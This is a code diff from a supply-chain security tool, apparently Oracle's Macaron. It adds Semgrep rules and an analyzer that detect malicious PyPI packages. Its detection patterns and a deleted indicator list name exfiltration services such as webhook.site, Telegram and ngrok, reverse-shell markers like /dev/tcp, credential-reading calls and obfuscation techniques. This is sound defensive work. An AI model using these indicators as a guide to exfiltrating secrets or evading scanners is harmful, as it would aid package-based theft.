ConfigurationError(error_msg) + + section_name = "heuristic.pypi" + + if defaults.has_section(section_name): + section = defaults[section_name] + else: + error_msg = f"Unable to find section {section_name}, which must be present." + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + configuration_name = "custom_semgrep_rules" + custom_rule_path = section.get(configuration_name) + if not custom_rule_path: # i.e. None or empty string + logger.debug("No custom path listed under %s, using default rules only.", configuration_name) + return default_rule_path, None + + custom_rule_path = os.path.normpath(custom_rule_path) + if not os.path.exists(custom_rule_path): + error_msg = f"Unable to locate path {custom_rule_path}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + semgrep_commands: list[str] = ["semgrep", "scan", "--validate", "--oss-only", "--config", custom_rule_path] + try: + process = subprocess.run(semgrep_commands, check=True, capture_output=True) # nosec + except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as semgrep_error: + error_msg = f"Unable to run semgrep validation on {custom_rule_path} with arguments {semgrep_commands}: {semgrep_error}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) from semgrep_error + + if process.returncode != 0: + error_msg = f"Error running semgrep validation on {custom_rule_path} with arguments" f" {process.args}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + logger.debug("Including custom ruleset from %s.", custom_rule_path) + return default_rule_path, custom_rule_path + + def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the source code of the package for malicious patterns. + + This is the first phase of the source code analyzer. + + Parameters + ---------- + pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. + + Returns + ------- + tuple[HeuristicResult, dict[str, JsonType]] + Containing the analysis results and relevant patterns identified. + + Raises + ------ + HeuristicAnalyzerValueError + if there is no source code available. + """ + analysis_result: dict = {} + # only run semgrep open-source features, and disable 'nosemgrep' ignoring so this does not bypass our scan + semgrep_commands: list[str] = ["semgrep", "scan", "--oss-only", "--disable-nosem"] + result: HeuristicResult = HeuristicResult.PASS + + source_code_path = pypi_package_json.package_sourcecode_path + if not source_code_path: + error_msg = "Unable to retrieve PyPI package source code path" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) + + semgrep_commands.extend(["--config", self.default_rule_path]) + if self.custom_rule_path: + semgrep_commands.extend(["--config", self.custom_rule_path]) + semgrep_commands.append(source_code_path) + + with tempfile.NamedTemporaryFile(mode="w+", delete=True) as output_json_file: + semgrep_commands.append(f"--json-output={output_json_file.name}") + try: + process = subprocess.run(semgrep_commands, check=True, capture_output=True) # nosec + except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as semgrep_error: + error_msg = ( + f"Unable to run semgrep on {source_code_path} with arguments {semgrep_commands}: {semgrep_error}" + ) + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) from semgrep_error + + if process.returncode != 0: + error_msg = f"Error running semgrep on {source_code_path} with arguments" f" {process.args}" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) + + semgrep_output = json.loads(output_json_file.read()) + + if not semgrep_output: + return result, {} + + semgrep_findings = json_extract(semgrep_output, ["results"], list) + if not semgrep_findings: + return result, {} + + result = HeuristicResult.FAIL # some semgrep rules were triggered + for finding in semgrep_findings: + rule_id = json_extract(finding, ["check_id"], str) + file = json_extract(finding, ["path"], str) + if not rule_id or not file: + continue + + file = os.path.relpath(file, os.path.dirname(source_code_path)) + start = json_extract(finding, ["start", "line"], int) + end = json_extract(finding, ["end", "line"], int) + message = json_extract(finding, ["extra", "message"], str) + + if rule_id not in analysis_result: + analysis_result[rule_id] = {"message": message, "detections": []} + + analysis_result[rule_id]["detections"].append({"file": file, "start": start, "end": end}) + + return result, analysis_result diff --git a/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml b/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml deleted file mode 100644 index 9c15144d4..000000000 --- a/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml +++ /dev/null @@ -1,101 +0,0 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - - -#This file defines the malicious pattern. -#The pattern is collected from the malware repository of Pypi.org. -imports: -- requests -- base64 -- Fernet -- telebot -- platform -- ClientSession -- socket -- os -- getpass -- telegram -- __pyarmor__ -- urllib.request.urlopen -- subprocess -- Request - -ast_calls: - os_detection: - - os.name - code_execution: - - exec - - subprocess.run - - subprocess.call - - subprocess.Popen - - subprocess.check_call - - os.system - info_collecting: - - os.getcwd - - os.getlogin - - os.getenv - - os.environ - - os.uname - - getpass.getuser - - socket.gethostname - - platform.node - - platform.system - - platform.version - - keyboard.on_release - obfuscation: - - base64.b64decode - - __pyarmor__ - # - Fernet.decrypt - remote_connection: - - requests.get - - requests.post - - telegram.send_document - - urllib.request.urlopen - - urllib.request.urlretrieve - - Request - - socket.socket - custom_setup: - - install - reverse_shell: - - os.dup2 - -ast_constant: - domains: - - webhook.site - - discord - - cdn.discordapp.com - - oast.fun - - api.telegram.org - - diddlydingusdu.de # builderknower2 - - pipedream.net # business-kpi-manager - - 2.tcp.ngrok.io - - files.pypihosted.org - - filebin.net - - akinasouls.fr - - api.ipify.org # Get public IP of the victim - - httpbin.or - - ngrok.ap - - oastify.com - - pythonanywhere.com - - deliverycontent.online - local_path: - - /storage/emulated/0 # Android: primary user account on the device - - /etc/resolv.conf # DNS - - /etc/hosts # DNS - - /sys/class/net # Network related - - /run/systemd/resolve/stub-resolv.conf - - /sdcard/DCIM # Photo storage - executable: - - .exe - windows: - - APPDATA - - Start-Process # Execute command - - powershell - reverse_shell: - - /dev/tcp - os_detection: - - nt # Windows - - Windows - - Darwin # MacOS - - Linux - - posix # Linux diff --git a/src/macaron/repo_finder/repo_finder_pypi.py b/src/macaron/repo_finder/repo_finder_pypi.py index 7525c3779..cd9b331a7 100644 --- a/src/macaron/repo_finder/repo_finder_pypi.py +++ b/src/macaron/repo_finder/repo_finder_pypi.py @@ -67,7 +67,7 @@ def find_repo( break if not pypi_asset: - pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}) + pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}, "") if not pypi_asset.package_json and not pypi_asset.download(dest=""): return "", RepoFinderInfo.PYPI_HTTP_ERROR diff --git a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml new file mode 100644 index 000000000..fd96eeef0 --- /dev/null +++ b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml @@ -0,0 +1,271 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +rules: +- id: exfiltration_remote-exfiltration + metadata: + description: Detects the flow of sensitive information to a remote endpoint. + message: Detected exfiltration of sensitive data to a remote endpoint + languages: + - python + severity: ERROR + mode: taint + options: + # this will help us detect the flow of objects for exfiltration, like + # "with requests.Session() as s: s.get(...)" + symbolic_propagation: true + pattern-sources: + - pattern-either: + # result of code/command evaluation + - pattern: exec(...) + - pattern: eval(...) + - pattern: builtins.exec(...) + - pattern: builtins.eval(...) + - pattern: __import__('builtins').exec(...) + - pattern: __import__('builtins').eval(...) + + # process spawning + # using subprocess module + - pattern: subprocess.check_output(...) + - pattern: subprocess.check_call(...) + - pattern: subprocess.run(...) + - pattern: subprocess.call(...) + - pattern: subprocess.Popen(...) + - pattern: subprocess.getoutput(...) + - pattern: subprocess.getstatusoutput(...) + # using os module + - pattern: os.execl(...) + - pattern: os.execle(...) + - pattern: os.execlp(...) + - pattern: os.execlpe(...) + - pattern: os.execv(...) + - pattern: os.execve(...) + - pattern: os.execvp(...) + - pattern: os.execvpe(...) + - pattern: os.popen(...) + - pattern: os.posix_spawn(...) + - pattern: os.posix_spawnp(...) + - pattern: os.spawnl(...) + - pattern: os.spawnle(...) + - pattern: os.spawnlp(...) + - pattern: os.spawnlpe(...) + - pattern: os.spawnv(...) + - pattern: os.spawnve(...) + - pattern: os.spawnvp(...) + - pattern: os.spawnvpe(...) + - pattern: os.system(...) + - pattern: os.popen(...) + # using commands module + - pattern: commands.getstatusoutput(...) + - pattern: commands.getoutput(...) + # using runpy module + - pattern: runpy.run_module(...) + - pattern: runpy.run_path(...) + + # environment variables + - pattern: os.environ + - pattern: os.environ[...] + - pattern: os.environ.get(...) + - pattern: os.environb + - pattern: os.environb[...] + - pattern: os.environb.get(...) + - pattern: os.getenv(...) + - pattern: os.getenvb(...) + + # system information + - pattern: os.uname(...) + - pattern: os.confstr(...) + - pattern: os.confstr_names + - pattern: os.sysconf(...) + - pattern: os.sysconf_names + - pattern: platform.release(...) + - pattern: platform.version(...) + - pattern: platform.uname(...) + - pattern: platform.win32_ver(...) + - pattern: platform.win32_edition(...) + - pattern: platform.win32_is_iot(...) + - pattern: platform.mac_ver(...) + - pattern: platform.ios_ver(...) + - pattern: platform.libc_ver(...) + - pattern: platform.freedesktop_os_release(...) + - pattern: platform.android_ver(...) + + # network information + - pattern: psutil.net_connections(...) + - pattern: psutil.net_if_addrs(...) + - pattern: psutil.net_if_stats(...) + - pattern: platform.node(...) + - pattern: platform.platform(...) + - pattern: socket.gethostname(...) + - pattern: socket.gethostbyname(...) + - pattern: socket.gethostbyname_ex(...) + - pattern: socket.getfqdn(...) + - pattern: socket.if_nameindex(...) + + # user information + - pattern: psutil.users(...) + + # sensitive information + - pattern: getpass.getpass(...) + - pattern: getpass.unix_getpass(...) + - pattern: getpass.win_getpass(...) + - pattern: getpass.getuser(...) + - pattern: pwd.getpwuid(...) + - pattern: pwd.getpwnam(...) + - pattern: pwd.getpwall(...) + - pattern: keyring.get_keyring(...) + - pattern: keyring.get_password(...) + - pattern: keyring.get_credential(...) + + # file exfiltration + - pattern: os.read(...) + - patterns: + - pattern-either: + - pattern-inside: | + with open(...) as $FILE: + ... + - pattern-inside: | + with builtins.open(...) as $FILE: + ... + - pattern-inside: | + with __import__('builtins').open(...) as $FILE: + ... + - pattern-inside: | + $FILE = open(...) + ... + - pattern-inside: | + $FILE = builtins.open(...) + ... + - pattern-inside: | + $FILE = __import__('builtins').open(...) + ... + - pattern-either: + - pattern: $FILE.read(...) + - pattern: $FILE.readlines(...) + - pattern: yaml.safe_load(...) + - pattern: json.loads(...) + + pattern-sinks: + - pattern-either: + # remote connection + # using socket module + - patterns: + - pattern-either: + - patterns: + - pattern-either: + - pattern-inside: | + $SOC = socket.socket(...) + ... + - pattern-inside: | + with socket.socket(...) as $SOC: + ... + - pattern-either: + - pattern-inside: | + $SOC.connect(...) + ... + - pattern-inside: | + $SOC.connect_ex(...) + ... + - pattern-inside: | + $SOC.bind(...) + ... + # socket.socket and socket.connect in one call + - pattern-inside: | + $SOC = socket.create_connection(...) + ... + - pattern-inside: | + with socket.create_connection(...) as $SOC: + ... + # socket.socket and socket.bind in one call + - pattern-inside: | + $SOC = socket.create_server(...) + ... + - pattern-inside: | + with socket.create_server(...) as $SOC: + ... + - pattern-either: + # Assume that .accept, .listen was called somewhere if needed + - pattern: $SOC.send(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) + - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) + # using requests module + - pattern: requests.get(...) + - pattern: requests.post(...) + - pattern: requests.put(...) + - pattern: requests.delete(...) + - pattern: requests.head(...) + - pattern: requests.options(...) + - pattern: requests.patch(...) + # object creation like requests.Session(...) here is omitted as exfiltrated data likely won't + # be passed into the parameters of those objects + - pattern: requests.Session(...).get(...) + - pattern: requests.Session(...).delete(...) + - pattern: requests.Session(...).head(...) + - pattern: requests.Session(...).options(...) + - pattern: requests.Session(...).patch(...) + - pattern: requests.Session(...).post(...) + - pattern: requests.Session(...).put(...) + - pattern: requests.Session(...).request(...) + - pattern: requests.Session(...).send(...) + - pattern: requests.Request(...) + # using urllib3 module + - pattern: urllib3.request(...) + - pattern: urllib3.PoolManager(...).request(...) + - pattern: urllib3.PoolManager(...).request_encode_body(...) + - pattern: urllib3.PoolManager(...).request_encode_url(...) + - pattern: urllib3.PoolManager(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).request(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPSConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPSConnectionPool(...).request(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPConnection(...).request(...) + - pattern: urllib3.HTTPConnection(...).request_chunked(...) + - pattern: urllib3.HTTPSConnection(...).request(...) + - pattern: urllib3.HTTPSConnection(...).request_chunked(...) + - pattern: urllib3.ProxyManager(...).urlopen(...) + # using urllib + - pattern: urllib.request(...) + - pattern: urllib.request.urlopen(...) + # using httpx + - pattern: httpx.request(...) + - pattern: httpx.get(...) + - pattern: httpx.post(...) + - pattern: httpx.put(...) + - pattern: httpx.delete(...) + - pattern: httpx.head(...) + - pattern: httpx.options(...) + - pattern: httpx.stream(...) + - pattern: httpx.patch(...) + - pattern: httpx.AsyncClient(...).request(...) + - pattern: httpx.AsyncClient(...).get(...) + - pattern: httpx.AsyncClient(...).post(...) + - pattern: httpx.AsyncClient(...).put(...) + - pattern: httpx.AsyncClient(...).delete(...) + - pattern: httpx.AsyncClient(...).head(...) + - pattern: httpx.AsyncClient(...).options(...) + - pattern: httpx.AsyncClient(...).stream(...) + - pattern: httpx.AsyncClient(...).patch(...) + - pattern: httpx.AsyncClient(...).send(...) + - pattern: httpx.Client(...).request(...) + - pattern: httpx.Client(...).get(...) + - pattern: httpx.Client(...).post(...) + - pattern: httpx.Client(...).put(...) + - pattern: httpx.Client(...).delete(...) + - pattern: httpx.Client(...).head(...) + - pattern: httpx.Client(...).options(...) + - pattern: httpx.Client(...).stream(...) + - pattern: httpx.Client(...).patch(...) + - pattern: httpx.Client(...).send(...) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml new file mode 100644 index 000000000..6d6ea066b --- /dev/null +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -0,0 +1,313 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +rules: +- id: obfuscation_inline-imports + metadata: + description: Detects use of inline imports with suspicious APIs, or obfuscated API imports. + message: Found an instance of a suspicious API in a hardcoded inline import + languages: + - python + severity: ERROR + pattern-either: + - pattern: __import__('base64') + - pattern: __import__('builtins') + - pattern: __import__('subprocess') + - pattern: __import__('sys') + - pattern: __import__('os') + - pattern: __import__('zlib') + - pattern: __import__('marshal') + # python will evaluate a hex/oct string + - patterns: + - pattern: __import__('$HEX') + - metavariable-regex: + metavariable: $HEX + regex: (\\x\d{2})+ + - patterns: + - pattern: __import__('$OCT') + - metavariable-regex: + metavariable: $OCT + regex: (\\\d{3})+ + +- id: obfuscation_obfuscation-tools + metadata: + description: Detects the use of common python obfuscation packages. + message: Found an indicator of the use of a python code obfuscation tool + languages: + - python + severity: ERROR + pattern-either: + # pyarmor: pyarmor.readthedocs.io/en/latest/index.html + - pattern: import __pyarmor__ + - pattern: from $MODULE import __pyarmor__ + - pattern: from $MODULE import pyarmor_runtime + - pattern: __import__('__pyarmor__') + # pyarmor RTF mode: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html + - pattern: __assert_armored__($PAYLOAD) + # inline pyarmor marker: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html + - pattern-regex: ^\s*#\s*pyarmor:.* + # obfuscated names using pyob.oxyry.com with O, o, 0 or github.com/QQuick/Opy and pyobfuscate using l, I, 1 + - patterns: + - pattern-either: + - pattern: | + def $OBF(...): + ... + - pattern: | + class $OBF(...): + ... + - pattern: $OBF = ... + - metavariable-regex: + metavariable: $OBF + regex: (^_*([lI1_]{5,}|[Oo0_]{5,})_*$)|(^pyarmor_*\d+$) + # obfuscated using pyobfuscate.com + - pattern: pyobfuscate=... + # obfuscated using liftoff.github.io/pyminifier + - pattern: import mystificate + - pattern: import demiurgic + +- id: obfuscation_decode-and-execute + metadata: + description: Detects the flow of a decoded or constructed string to process execution, code evaluation, network connections, or file writes. + message: Detected the flow of a decoded primitive value to a remote endpoint, process, code evaluation, or file write + languages: + - python + severity: ERROR + mode: taint + options: + # This will help detect partial things over multiple lines like: "x = builtins.bytes; x.decode(...)" + symbolic_propagation: true + pattern-sources: + - pattern-either: + # marshal encryption + - pattern: marshal.loads(...) + - pattern: __import__('marshal').loads(...) + # bytes decoding + - pattern: | + b'...'.decode(...) + - pattern: bytes.decode(...) + - pattern: builtins.bytes.decode(...) + - pattern: __import__('builtins').bytes.decode(...) + # decompression + - pattern: zlib.decompress(...) + - pattern: __import__('zlib').decompress(...) + # base64 decoded string values + - pattern: base64.b64decode(...) + - pattern: __import__('base64').b64decode(...) + - pattern: b64decode(...) + # hex encoded values + - pattern: bytes.fromhex(...) + - pattern: builtins.bytes.fromhex(...) + - pattern: __import__('builtins').bytes.fromhex(...) + # unicode construction + - patterns: + - pattern-either: + - pattern: $STRING.join(map($FOO, [...])) + - pattern: $STRING.join($FOO($VAL) for $VAL in [...]) + - pattern: $STRING.join($FOO($VAL) for $VAL in $ITER) + - pattern: $STRING.join($FOO($VAL) for $VAL in $GEN(...)) + - metavariable-regex: + metavariable: $FOO + regex: unicode|unichr|chr|ord + + pattern-sinks: + - pattern-either: + # remote connection + # using socket module + - patterns: + - pattern-either: + - patterns: + - pattern-either: + - pattern-inside: | + $SOC = socket.socket(...) + ... + - pattern-inside: | + with socket.socket(...) as $SOC: + ... + - pattern-either: + - pattern-inside: | + $SOC.connect(...) + ... + - pattern-inside: | + $SOC.connect_ex(...) + ... + - pattern-inside: | + $SOC.bind(...) + ... + # socket.socket and socket.connect in one call + - pattern-inside: | + $SOC = socket.create_connection(...) + ... + - pattern-inside: | + with socket.create_connection(...) as $SOC: + ... + # socket.socket and socket.bind in one call + - pattern-inside: | + $SOC = socket.create_server(...) + ... + - pattern-inside: | + with socket.create_server(...) as $SOC: + ... + - pattern-either: + # Assume that .accept, .listen was called somewhere if needed + - pattern: $SOC.send(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) + - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) + # using requests module + - pattern: requests.get(...) + - pattern: requests.post(...) + - pattern: requests.put(...) + - pattern: requests.delete(...) + - pattern: requests.head(...) + - pattern: requests.options(...) + - pattern: requests.patch(...) + - pattern: requests.Session(...).get(...) + - pattern: requests.Session(...).delete(...) + - pattern: requests.Session(...).head(...) + - pattern: requests.Session(...).options(...) + - pattern: requests.Session(...).patch(...) + - pattern: requests.Session(...).post(...) + - pattern: requests.Session(...).put(...) + - pattern: requests.Session(...).request(...) + - pattern: requests.Session(...).send(...) + - pattern: requests.Request(...) + # using urllib3 module + - pattern: urllib3.request(...) + # object creation here is included as decoded values may be passed as parameters + - pattern: urllib3.PoolManager(...) + - pattern: urllib3.PoolManager(...).request(...) + - pattern: urllib3.PoolManager(...).request_encode_body(...) + - pattern: urllib3.PoolManager(...).request_encode_url(...) + - pattern: urllib3.PoolManager(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...) + - pattern: urllib3.HTTPConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).request(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPSConnectionPool(...) + - pattern: urllib3.HTTPSConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPSConnectionPool(...).request(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPConnection(...) + - pattern: urllib3.HTTPConnection(...).request(...) + - pattern: urllib3.HTTPConnection(...).request_chunked(...) + - pattern: urllib3.HTTPSConnection(...) + - pattern: urllib3.HTTPSConnection(...).request(...) + - pattern: urllib3.HTTPSConnection(...).request_chunked(...) + - pattern: urllib3.ProxyManager(...).urlopen(...) + # using urllib + - pattern: urllib.request(...) + - pattern: urllib.request.urlopen(...) + # using httpx + - pattern: httpx.request(...) + - pattern: httpx.get(...) + - pattern: httpx.post(...) + - pattern: httpx.put(...) + - pattern: httpx.delete(...) + - pattern: httpx.head(...) + - pattern: httpx.options(...) + - pattern: httpx.stream(...) + - pattern: httpx.patch(...) + - pattern: httpx.AsyncClient(...) + - pattern: httpx.AsyncClient(...).request(...) + - pattern: httpx.AsyncClient(...).get(...) + - pattern: httpx.AsyncClient(...).post(...) + - pattern: httpx.AsyncClient(...).put(...) + - pattern: httpx.AsyncClient(...).delete(...) + - pattern: httpx.AsyncClient(...).head(...) + - pattern: httpx.AsyncClient(...).options(...) + - pattern: httpx.AsyncClient(...).stream(...) + - pattern: httpx.AsyncClient(...).patch(...) + - pattern: httpx.AsyncClient(...).send(...) + - pattern: httpx.Client(...) + - pattern: httpx.Client(...).request(...) + - pattern: httpx.Client(...).get(...) + - pattern: httpx.Client(...).post(...) + - pattern: httpx.Client(...).put(...) + - pattern: httpx.Client(...).delete(...) + - pattern: httpx.Client(...).head(...) + - pattern: httpx.Client(...).options(...) + - pattern: httpx.Client(...).stream(...) + - pattern: httpx.Client(...).patch(...) + - pattern: httpx.Client(...).send(...) + + # process spawning + # using subprocess module + - pattern: subprocess.check_output(...) + - pattern: subprocess.check_call(...) + - pattern: subprocess.run(...) + - pattern: subprocess.call(...) + - pattern: subprocess.Popen(...) + - pattern: subprocess.getoutput(...) + - pattern: subprocess.getstatusoutput(...) + # using os module + - pattern: os.execl(...) + - pattern: os.execle(...) + - pattern: os.execlp(...) + - pattern: os.execlpe(...) + - pattern: os.execv(...) + - pattern: os.execve(...) + - pattern: os.execvp(...) + - pattern: os.execvpe(...) + - pattern: os.popen(...) + - pattern: os.posix_spawn(...) + - pattern: os.posix_spawnp(...) + - pattern: os.spawnl(...) + - pattern: os.spawnle(...) + - pattern: os.spawnlp(...) + - pattern: os.spawnlpe(...) + - pattern: os.spawnv(...) + - pattern: os.spawnve(...) + - pattern: os.spawnvp(...) + - pattern: os.spawnvpe(...) + - pattern: os.system(...) + # using commands module + - pattern: commands.getstatusoutput(...) + - pattern: commands.getoutput(...) + # using runpy module + - pattern: runpy.run_module(...) + - pattern: runpy.run_path(...) + + # code evaluation/execution + - pattern: exec(...) + - pattern: eval(...) + - pattern: builtins.exec(...) + - pattern: builtins.eval(...) + - pattern: __import__('builtins').exec(...) + - pattern: __import__('builtins').eval(...) + + # file write + - patterns: + - pattern-either: + - pattern-inside: | + with open(...) as $FILE: + ... + - pattern-inside: | + with builtins.open(...) as $FILE: + ... + - pattern-inside: | + with __import__('builtins').open(...) as $FILE: + ... + - pattern-inside: | + $FILE = open(...) + ... + - pattern-inside: | + $FILE = builtins.open(...) + ... + - pattern-inside: | + $FILE = __import__('builtins').open(...) + ... + - pattern: $FILE.write(...) + - pattern: os.write(...) + - pattern: os.writev(...) + - pattern: os.pwrite(...) + - pattern: os.pwritev(...) diff --git a/src/macaron/slsa_analyzer/analyze_context.py b/src/macaron/slsa_analyzer/analyze_context.py index 84d8151f2..0f0804dc1 100644 --- a/src/macaron/slsa_analyzer/analyze_context.py +++ b/src/macaron/slsa_analyzer/analyze_context.py @@ -51,8 +51,8 @@ class ChecksOutputs(TypedDict): """The provenance and related information.""" local_artifact_paths: list[str] """The local artifact absolute paths.""" - validate_malware: bool - """True when the malware validation is enabled.""" + analyze_source: bool + """True when PyPI source code analysis has been enabled.""" class AnalyzeContext: @@ -106,7 +106,7 @@ def __init__( expectation=None, provenance_info=None, local_artifact_paths=[], - validate_malware=False, + analyze_source=False, ) @property diff --git a/src/macaron/slsa_analyzer/analyzer.py b/src/macaron/slsa_analyzer/analyzer.py index e3957e875..ed5dfe039 100644 --- a/src/macaron/slsa_analyzer/analyzer.py +++ b/src/macaron/slsa_analyzer/analyzer.py @@ -136,8 +136,8 @@ def run( sbom_path: str = "", deps_depth: int = 0, provenance_payload: InTotoPayload | None = None, - validate_malware: bool = False, verify_provenance: bool = False, + analyze_source: bool = False, ) -> int: """Run the analysis and write results to the output path. @@ -154,10 +154,10 @@ def run( The depth of dependency resolution. Default: 0. provenance_payload : InToToPayload | None The provenance intoto payload for the main software component. - validate_malware: bool - Enable malware validation if True. verify_provenance: bool Enable provenance verification if True. + analyze_source : bool + When true, triggers source code analysis for PyPI packages. Defaults to False. Returns ------- @@ -190,8 +190,8 @@ def run( main_config, analysis, provenance_payload=provenance_payload, - validate_malware=validate_malware, verify_provenance=verify_provenance, + analyze_source=analyze_source, ) if main_record.status != SCMStatus.AVAILABLE or not main_record.context: @@ -309,8 +309,8 @@ def run_single( analysis: Analysis, existing_records: dict[str, Record] | None = None, provenance_payload: InTotoPayload | None = None, - validate_malware: bool = False, verify_provenance: bool = False, + analyze_source: bool = False, ) -> Record: """Run the checks for a single repository target. @@ -327,10 +327,10 @@ def run_single( The mapping of existing records that the analysis has run successfully. provenance_payload : InToToPayload | None The provenance intoto payload for the analyzed software component. - validate_malware: bool - Enable malware validation if True. verify_provenance: bool Enable provenance verification if True. + analyze_source : bool + When true, triggers source code analysis for PyPI packages. Defaults to False. Returns ------- @@ -541,7 +541,7 @@ def run_single( # TODO Add release tag, release digest. ) - analyze_ctx.dynamic_data["validate_malware"] = validate_malware + analyze_ctx.dynamic_data["analyze_source"] = analyze_source if parsed_purl and parsed_purl.type in self.local_artifact_repo_mapper: local_artifact_repo_path = self.local_artifact_repo_mapper[parsed_purl.type] diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index c69de3bde..0196ec93b 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -13,7 +13,7 @@ from macaron.database.db_custom_types import DBJsonDict from macaron.database.table_definitions import CheckFacts -from macaron.errors import HeuristicAnalyzerValueError +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError, SourceCodeError from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics @@ -25,7 +25,7 @@ from macaron.malware_analyzer.pypi_heuristics.metadata.source_code_repo import SourceCodeRepoAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.unchanged_release import UnchangedReleaseAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.wheel_absence import WheelAbsenceAnalyzer -from macaron.malware_analyzer.pypi_heuristics.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer +from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer from macaron.malware_analyzer.pypi_heuristics.sourcecode.suspicious_setup import SuspiciousSetupAnalyzer from macaron.slsa_analyzer.analyze_context import AnalyzeContext from macaron.slsa_analyzer.checks.base_check import BaseCheck @@ -100,26 +100,44 @@ def _should_skip( return True return False - def validate_malware(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[bool, dict[str, JsonType] | None]: - """Validate the package is malicious. + def analyze_source( + self, pypi_package_json: PyPIPackageJsonAsset, results: dict[Heuristics, HeuristicResult] + ) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the source code of the package with a textual scan, looking for malicious code patterns. Parameters ---------- pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. + results: dict[Heuristics, HeuristicResult] + Containing all heuristics' results (excluding this one), where the key is the heuristic and the value is the result + associated with that heuristic. Returns ------- - tuple[bool, dict[str, JsonType] | None] - Returns True if the source code includes suspicious pattern. - Returns the result of the validation including the line number - and the suspicious arguments. - e.g. requests.get("http://malicious.com") - return the "http://malicious.com" + tuple[HeuristicResult, dict[str, JsonType]] + Containing the analysis results and relevant patterns identified. + + Raises + ------ + HeuristicAnalyzerValueError + If the analyzer fails due to malformed package information. + ConfigurationError + If the configuration of the analyzer encountered a problem. """ - # TODO: This redundant function might be removed - sourcecode_analyzer = PyPISourcecodeAnalyzer(pypi_package_json) - is_malware, detail_info = sourcecode_analyzer.analyze() - return is_malware, detail_info + logger.debug("Instantiating %s", PyPISourcecodeAnalyzer.__name__) + analyzer = PyPISourcecodeAnalyzer() + + if analyzer.depends_on and self._should_skip(results, analyzer.depends_on): + return HeuristicResult.SKIP, {} + + try: + with pypi_package_json.sourcecode(): + return analyzer.analyze(pypi_package_json) + except SourceCodeError as error: + error_msg = f"Unable to perform analysis, source code not available: {error}" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) from error def 